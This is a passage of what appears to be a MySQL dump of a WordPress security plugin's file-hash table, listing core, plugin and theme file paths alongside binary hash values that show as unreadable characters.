\Z��/mw�#�','',0,'?'),('H��Y6o��D{�LH��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u.S��y�l�=\0C�>','�?�\\x`��Q�=���8:�v�sT��','',0,'?'),('Hý��i�Z�U,H�L','wp-admin/includes/meta-boxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bZJ-Q�!�eLU[g�','$Ƙ-����+��_��I�ښi����\r�2��','',0,'?'),('H���C�Tp(^��l�','wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�o���\nq]\\:\\c�','<��\'@�þ���Zh��Ӏ���o�@>����','',0,'?'),('I\r8p:́	ޞ}`�\Z�','wp-includes/blocks/query-pagination/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T����DڀB��','��\\��dIEd��Y���D�H5m����)�','',0,'?'),('IW�9�a��W��3(','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�™�q�W��\0�N(�','����z�4dһ�`��	\0B5��M�� ����','',0,'?'),('I0��S�$2�T�B*','wp-includes/widgets/class-wp-widget-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�#kjX�b�/�0�E','����u.�)G�F��9?4� �*2�>G\'l','',0,'?'),('I6.:\n(��i\0B��','wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�����Z)�*j�D','�z7���cb{�9\ZJ�0ӣ�7�}�\"ϽR�[\n[�','',0,'?'),('I6U�\r7����3p�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h<��|�7b����','��_�^F\"��;+r&Z~ӦQ����|�5�','',0,'?'),('IQM{��:�\r|�6c�e','wp-content/plugins/wp-cerber/assets/flags/il.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��~����3�24�Z�','�b=؜1<�:�1�ƭ��nn���`�%ޘ��Ϯ�','',0,'?'),('I��:Bs�#���@�','wp-blog-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_BZF1���y����)',';\Z�/\\b���t���I���͝���h��w�','',0,'?'),('Iƒ�&{��;�-H��','wp-includes/blocks/site-logo/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�\'�6йs�s�(','�0�\n-}�#�~�(7�?\r����a\0�X','',0,'?'),('I�Ԭ�l��v0O','wp-includes/js/dist/core-data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�\"�(N<6]�@{�|','��}���y�#��5���.2��>R(o�[','',0,'?'),('I�PE�Xt�FH�%�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0��Lv�[c��)?','�C�h!݀F$�}�wd�7b(�!�p�IF.L�','',0,'?'),('I��8߽�T�\Z����0�','wp-includes/blocks/list/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:{���LF7�B{\rt','��y��υH���PM��7�����1��F�m!','',0,'?'),('I�V/��6�s��','wp-admin/js/editor-expand.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','´R�[��6\\gTԄL_�','�vI\n6��6��%VG��}����@of�e;','',0,'?'),('J�%.��~�—q�l�','wp-includes/class-wp-text-diff-renderer-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����g0HFuI�','�_h+�U��H�i��_��e�	w����6��','',0,'?'),('J?#�͌$M�7�c�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�I.:���`PR�','#z��R�\ZHU���>B�nP,���\'�eT�tߺ','',0,'?'),('Jf�3?���_r�C�','wp-admin/images/w-logo-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���Jvۢ~�y�\\�','n��D��� _�;�!G�םcV�0M9i�=�','',0,'?'),('J��E[�7U��\Z�~','wp-includes/js/plupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̢*FL������ P','��i>ۍ�^��%���HhS��\"��X�o�\"','',0,'?'),('JyQl��D�!�HV�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-bot-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ɩ}�7\"]� Q�P|','�]a��;�tMY^�v�6�j����ꬆ��','',0,'?'),('J8�E��Dh+���F','wp-admin/js/site-health.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�IdC����VP�Q_','fz,,x��wZ\n\0\"�|�\"�ZI���`��xG�','',0,'?'),('Jl���1������','wp-content/plugins/wordfence/models/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('J{�ֹZi^ùx�I','wp-admin/media-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�$��q���~{�','X��M�p�Rmp�r�<U���7���8l~��','',0,'?'),('J�>����\"��/','wp-includes/Requests/Auth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+����y-uP�5�M9н','k����w�6XN\r�����0�c����Ֆ�','',0,'?'),('J���;<��C{߫��N�','wp-includes/blocks/spacer/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Iċ\r�뺈_j��|�t\'','.B��8���2U�����i�W�f\"o�\Z�i�O','',0,'?'),('Jլ4��\r�n���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('J򾁬��Oh��sDؾ','wp-includes/js/zxcvbn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|	���#PV	/{�M�_','v�XI�9��n�1e�6��C�\\�.p+�\"��K�','',0,'?'),('J�9v\'e\ZP�d�7���','wp-content/themes/newsmagbd/inc/customizer/theme-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$���#�sr��<�Y�e','��h�/�3����1�}��������#�,�\r','',0,'?'),('K���ߺ�b�','wp-content/plugins/wordfence/lib/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���z�x��C�}','�Nܓ�#d�t�B!\"M՞�==�@o��','',0,'?'),('K0���\r��ܐcn�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�29Y¿,E#�/����','� � ��h<)s��>-P��{���K���I�\0��','',0,'?'),('K9\Z�F�Qȸ\r$^&p��','wp-content/plugins/wp-cerber/languages/wp-cerber-uk.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��q�A�~P��	','*qn>�4����&�og�e��eʓ��˹^�5��','',0,'?'),('K>�^[�P�F�1�h:','wp-includes/blocks/social-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(G�ѻx�z��T@\"�','N�<Ě]�\r�$� �n��ѝ�_O��d��','',0,'?'),('KKOf�Sd�iB0Ov��','wp-content/plugins/wordfence/views/scanner/scanner-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�um��&�(�!���)','���I0-��=�Q5��S�G�LFx��h�','',0,'?'),('K�nҋD&sR�WU(�','wp-admin/css/farbtastic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�^�:�G�(���:k\n','4��7V�f�� �/��������D��W3p','',0,'?'),('K���R	wA���e','wp-includes/blocks/latest-posts/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o(;�3��-@m�\\��','�������U��}\0��\\Gh�y�1d���\ZE�','',0,'?'),('K�c��#2s�/(�\"�','wp-includes/widgets/class-wp-widget-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�ڦ�_��R�\n','���_�F#6�u�R�l�G�-��[f�{�\'','',0,'?'),('K��<�H<7�E�,l��','wp-content/plugins/wordfence/views/waf/options-group-brute-force.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�p�k�<���#Y','Qx�b���nbWK����E*�l�o��ޅ��ʛ��','',0,'?'),('K��ɹ���jwD�x�','wp-content/plugins/wp-cerber/assets/flags/us.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��V�w\Z]�Ay��','���L�CI`�^�J4�=��0���C�C}�','',0,'?'),('K����\r\\Uz��\Z:\'','wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�*��F谯��<��l','�®�R�l�U�����wz�ank��G�t�3�','',0,'?'),('K��]C��l7:�D\0','wp-admin/js/widgets/media-audio-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P IM�;p8vn��[�S','����9j��lxB�eH:�y�%}�c	TP�_�','',0,'?'),('K�Lx<C���H��e\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�EN�Ăۛ(\n�n','����Ѭ}^�EF����>��ڂB��','',0,'?'),('K�bw��y��.�3�{¥','wp-content/plugins/wp-cerber/assets/flags/pk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����00�%��[.�','Gjۀ���H��$�׃��m\'�^ O�n���','',0,'?'),('K� ���*�;ܼ�nc','wp-includes/blocks/calendar/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(a$�jg}�S5N�j�','�\\\"�>��v��A�(���K�m�ò.�[L��','',0,'?'),('K��W�&\0\0K�\06�G�','wp-admin/js/set-post-thumbnail.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':1N�(�xl�X��\'','v9�\n{lK��~q�#�>��ߦ��� J�`~','',0,'?'),('K�K+�2�	aeZ�e','wp-includes/class-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��ԝ\"����;e�','��1�crk��-E���g�\'�N�!ɶ','',0,'?'),('L<#���\Z����}','wp-includes/js/tinymce/skins/lightgray/img/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9K���M�:�Tf�9','��;���T��O`(6��,�sk�Z���c�R��+','',0,'?'),('L#��/۰*�3���\r','wp-admin/includes/class-wp-terms-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�ױ���������','b�{��E&�>#���b\r�o��6���(%f�','',0,'?'),('L(��n�9[2�C6�','wp-includes/js/zxcvbn-async.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��\nO\\��Y�b','��\'FP�\Z�/G\n��J����\\B��\Z��IT�','',0,'?'),('LC�g=��7���Ϸ��','wp-content/plugins/redirection/models/match.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5a�f�rl�P��. ��(','�0\0PX^��1���lU!s����k�0�)o� ��','',0,'?'),('LR7Q��ToG|�{','wp-content/plugins/wordfence/lib/viewFullActivityLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�>��&Q)�Fy�k','e�i�p��r9ݴZ\\�\\Q~`�?�7�=�R�','',0,'?'),('Lap���8g�V�,��g�','wp-includes/js/dist/vendor/react-dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��InV��9����','LrJ�#��6h����\r�ȴD�R5��b:uM','',0,'?'),('LsЇś\n�c}>�K��','wp-includes/css/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�&��W�iDJ�@��','��<�C:�LJ?����l��}\rZL�l�VY�','',0,'?'),('Lz����Z��#�<','wp-includes/class-wp-locale-switcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�?�F�w,�T��','!@�B��<6�ꁒ�Ku��Pm=��+�/c_�','',0,'?'),('L�m�����F�B�b*�','wp-content/themes/newsmagbd/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k?���U/��f@�:','�=J>��1bݓ�̿ԾC��ę<n(aX�\Zq','',0,'?'),('L��e�t\"pc(	�e�','wp-includes/wp-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yAS9�ie��P�','����I�&���e�*��7�K38�����','',0,'?'),('L����E��g���F9','wp-includes/blocks/post-featured-image/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�1������','W�ܕ��n�,^�(�i\'H����\n\Z=�\'','',0,'?'),('L�E+���<8^7�EP޳','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7ރ�礤�>s��','KN�ZE\"*}Ȩ+(K�ɧ;Y\rʙ4<PZ�\0','',0,'?'),('L�\r�%��{��','wp-includes/blocks/social-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M58�p9���_uCZ','D����-{A��>&u���%2 �h���L','',0,'?'),('L+q�V�;�h��Y�','wp-includes/fonts/dashicons.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M���N:��\'�ʤ��ȹ','J��!�����XLl`�e��O��s�H����','',0,'?'),('L�>t���N�����','wp-admin/css/colors/blue/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5Iה�g,)Z�YM�','�\\k��S�뚑�n wW��	�!�*�~�v��','',0,'?'),('L��)��a$�D-�Ӯ�J','wp-includes/js/tinymce/plugins/wplink/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��3���ܖ3��M','z�N\'A�%�S��@4�U���BD���q����','',0,'?'),('Mx1NjTm�R_2o','wp-content/plugins/wordfence/views/dashboard/global-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˫\'�m�`�0>�+#��','���������p������Pv?Z�F��QQcj','',0,'?'),('M1��/�n��̖Q��','wp-includes/css/dist/components/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Iڼ͝��d��*�','U‡���`���ih~3�P��w�_���','',0,'?'),('M?,5�*�����K*�f','wp-admin/js/post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�^�7 <��E�5k/','\0[���($E�Rn�3��k�ׁ1����U���\r','',0,'?'),('MW�	���:��ي','wp-admin/images/align-none.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eqd2���u����\r','�g(�1�X�{� [].���T����A��','',0,'?'),('MY��G��\\tX����/','wp-includes/customize/class-wp-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��S?��|��G','h	�3|:Q9z���4Y1[�{^�	$;�#�q��','',0,'?'),('M�[\Z�2hT�	�K�','wp-content/plugins/wp-cerber/assets/flags/tr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<~Qk�dIr&��-!','�\"��i0�M��˩��VJc���]�3�\n��[','',0,'?'),('MР\0�A���9Q�+��','wp-includes/js/admin-bar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�၈��n�&�a1a\0','(L��<����K�i�-��U4�Wܸ` ��rl$�','',0,'?'),('M�;C�����8Yyﲏ','wp-includes/js/twemoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�	!A֗�//x4��','gs�!�W�-.?�wh��N��K�It�{��|','',0,'?'),('M���I�M��rD��-','wp-includes/post-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[�\\ ��\r�\0@\0','�CPD#3��=qO�n*�Ost%pen�6�','',0,'?'),('N7�A�\0�nnV�֑�','wp-content/plugins/wordfence/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��G\r�6|􈘀\'','��y~`w(j�~�=뤼&��ݴ���Q>`^�x','',0,'?'),('N=�f�>$K���H�T�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?�G{�����g','ĀР<W�;-\Z񀍙��(C+�,M���U��W6','',0,'?'),('Ni�~	�`���W�E','wp-content/plugins/wordfence/lib/wfAlerts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�(A��|�ϯy��L','�\'_�;?�|US5d}K/+,I!|��t','',0,'?'),('Nxa�߭�̿��(r�_','wp-content/plugins/all-in-one-wp-security-and-firewall/backups/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('N|�‡Jв�zn�sw','wp-includes/pluggable-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���\"�j��2�ߖ','��U����=����co��=t1�-\\�\r�=','',0,'?'),('N�3�j@pu5����^��','wp-includes/js/tinymce/skins/wordpress/images/more.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\nm\0;�˫�z','$��v��o^���U� �A\0���:�\\C�u��','',0,'?'),('N��HV����}�4G','wp-admin/css/customize-widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�#{�0xp���F��','U;�{���Y+s�҉�ŋe�|���7���rY','',0,'?'),('N�UBy�a�� ��','wp-includes/blocks/columns/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ç+���U�z�ɄA','�6���M�)v�ݱ�J�^IS���#���Vt!+4','',0,'?'),('N��lI���V�,�Z�','wp-content/plugins/wp-cerber/assets/flags/hn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;Ҿ����:��','e��{9�[�۫�p��Nk83)t����$<5�','',0,'?'),('O	��S����#�Yi�v','wp-admin/includes/class-wp-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a����j�>h����','�-щ&�^�N[��j�d2Lْ�S]�H��','',0,'?'),('O�ҽPT�^�4~��B','wp-includes/css/dist/editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�tK���=���k\Z','!�ڎd�F5M�w�%�Y�Ė��2餒�9�\nQ','',0,'?'),('O =(�:��<�	�1F�','wp-includes/class-wp-feed-cache-transient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��?^>��O�',':��;h�!xE�z��P+�dV�0����D�','',0,'?'),('O+���[�IB���m�m\'','wp-content/plugins/wordfence/images/wf-central-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�(��VѤ���','\0{\r�ߘ�J/� �^�+��,��S������','',0,'?'),('O4�dzWQ�\0��R��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Lj���\"C�ix���','��x眪!����}�\Z�����W����d','',0,'?'),('O=��h�\0}O��rL�b','wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�U��~�L5�@\ZVU','/�r��T�rm����G�с�\r�%�e\r��|�[','',0,'?'),('OJ�?�Cz�V�^2���1','wp-content/plugins/wp-cerber/assets/flags/mr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��Y��kF���@','���c���n�foaYd��M@�0O��DI\n��x','',0,'?'),('OS�Y�Wz!8�ʣj�','wp-content/plugins/wordfence/views/gdpr/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3]_�E֡h��\Z�N�','-�6�U�2Ѧ��\Z�1����&�=�mh���(_','',0,'?'),('OT���;�h�FR|�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-maintenance-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;I�U`��t���',';�9�sM�lȴ[\ZZY��B�����{��Re','',0,'?'),('OlqCcێ���������','wp-admin/css/forms-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�6���E����','�>�\r忈����R[�>��Y��L	Q\07U','',0,'?'),('Oy�}Ma���_��I','wp-includes/Requests/Exception/HTTP/504.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A����� wj�љ�9�','�<����!B�|$k���݈�# �e�i%0','',0,'?'),('O�潼m$��݋&_','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�F��\n�D��ҭ�','2\"�ޡ�4e���Kӗ�p!w#�����1���,','',0,'?'),('O��\\���P5��{�R�','wp-admin/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9=�C���;��w^�X','�_\n�W����o�0w�����7��`=�r��','',0,'?'),('O����&�r�蓏�� ','wp-admin/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɞ��WH‡v,j','�r����陖����B�B`�tp޴�����h~','',0,'?'),('O����R�r����D�?�','wp-admin/js/postbox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���J��z%p','�qG%`�3E�:j~^�\ZҌ��;,��','',0,'?'),('O����y ��k	b�','wp-admin/css/customize-nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�3���b�Q�.���','��\"DY������	t��B5�aK��1�','',0,'?'),('O�����HI!K!0[�','wp-content/plugins/wordfence/lib/menu_scanner_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�����D�X�;�I','���C�&YB�p_d$�,+������Ŝ���J��','',0,'?'),('O�5e���;hz�w@�W','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z<����{~G�f(','��,ב[\Z���@�+���?x���P��А�','',0,'?'),('O��O�M_K7�n��','wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*5���^gG�o<NN','5�\'4ϣ�j3Ò�NjX�CU�!�����]~','',0,'?'),('O�hu�G���&\0�L�','wp-includes/Text/Diff/Engine/native.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S���\r��$�T','S��\04�v@�ű`�DG V�u�e�R��B竇3�','',0,'?'),('P��H��Z`�=���','wp-includes/blocks/pullquote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g#-���:#fﰕk8','fzʫ����W3�.OJ����JI��o�J٥�','',0,'?'),('P�bw�=����i��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\Z��Iw5AlLۢ�','��K{�8��fl��7s�Rh���嗋��I','',0,'?'),('P�/:��̮�҉���H','wp-content/plugins/wordfence/waf/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�З:4�z��M�E�7�','�!8�s���w�#�)��\r�<�r|2y*LS^','',0,'?'),('PE۫�7r|oI�6��>','wp-includes/js/backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`ft7\\J�*��4a','j�˯�}j�$��@�č��� n%Q|�l��','',0,'?'),('P ���NtD�݌�n\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��!�,��^�q�','X߇p�Ք�Z��Љ�ֱo�\r�=˸<!�~�3�','',0,'?'),('P&_#�\'�zT���s','wp-includes/Requests/Exception/HTTP/417.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oP�%~�75jN��}a�','���L�T��Ҙ$xDs�^�h_!kC�\"1\'��_�','',0,'?'),('P\'�(���?+�z��$�','wp-admin/js/postbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$;�9H�S_��7���','��`���R���f!Rd�<����Q�� ��GIJ','',0,'?'),('P73o�	��\0�=��','wp-admin/js/word-count.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rffB)��������','��6j�,A�ުǭs�D��eC�z�&���\n���','',0,'?'),('PJ�~]��; ��`y','wp-includes/widgets/class-wp-widget-media-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dCa�*C^e~OriA�','�L�/�T|����w�pEf1�Ln��!y���','',0,'?'),('PK��2�I��)��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[�h�k�da4�p','�&�!�7^�@��9���N�BT�����*8�','',0,'?'),('P��[�D�XP��a���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;u‰�S���l','�M>:\r�&�V��`�\Z:�O0�Sv;\0��V�w','',0,'?'),('P��iz�t�a�}�a','wp-admin/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S}�:T&��B�ܽ6,','��2��n,�/M�V��5��[~_��= ե�','',0,'?'),('P��h���~��P�','wp-includes/blocks/page-list/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�� d�p����Ur','4QNs��Ò��v�v��7D��b�`0f�0�gg','',0,'?'),('P��\n�e���u�\"�','wp-includes/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��B�c��f4�[�\\','\'�{~���V�A(�p�X���ȵ�E/�','',0,'?'),('P��y����Xn��','wp-content/plugins/wp-cerber/assets/flags/an.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B����\ZEs�F\r�8','���Z��iLz�q`�{ۯۇn	�fN�zY3i�','',0,'?'),('P�a�l&��:�)V�I�','wp-content/plugins/wp-cerber/assets/flags/ax.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l���ho��%>��T�','Ku*Q(�g�iC�`i0�����ȇ�R.�c���','',0,'?'),('P�@���;b<\n�c�','wp-includes/class-wp-oembed-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͕��ha�p���^��f','��Lz�A{�@g�\0����{Γؼqx҆X','',0,'?'),('P�M�\Z�I̸�ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Euƻ\\S w?,�_�L`','��� ��i�Lƛw���6�_���,n�2S��Zh)','',0,'?'),('P�1$���\\*�C','wp-admin/images/stars-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���#�S�Me.^','[��耿�_(\rh���Y���T��qZ��','',0,'?'),('P��0��a��R�z= ','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�gkeͿݾ���|�h','�H��zj鞨%�����p=�Z��iNA�Z�','',0,'?'),('Q;���(����Mp*�','wp-admin/js/widgets/media-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%G�>6����\n���','�B�)c9Վ3I�H�2�j���}~I�b?_��','',0,'?'),('QC�ȧ���$9B)��M','wp-includes/blocks/tag-cloud/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y���i�\0�չ~f','t�o���SaV�4A���)ޞ[��IL�T�|Ӭ5','',0,'?'),('QT���*�f�P��.�','wp-admin/includes/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\vy��S�t�A�','w�r�Q�sxϐ�؄G��8R%�䯶1f�����','',0,'?'),('QY��1�Tl��Vr<','wp-includes/js/customize-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),('QuoPX��\0��Sڞ','wp-admin/images/bubble_bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�g<ć�I����0','\'+u�W�`-A���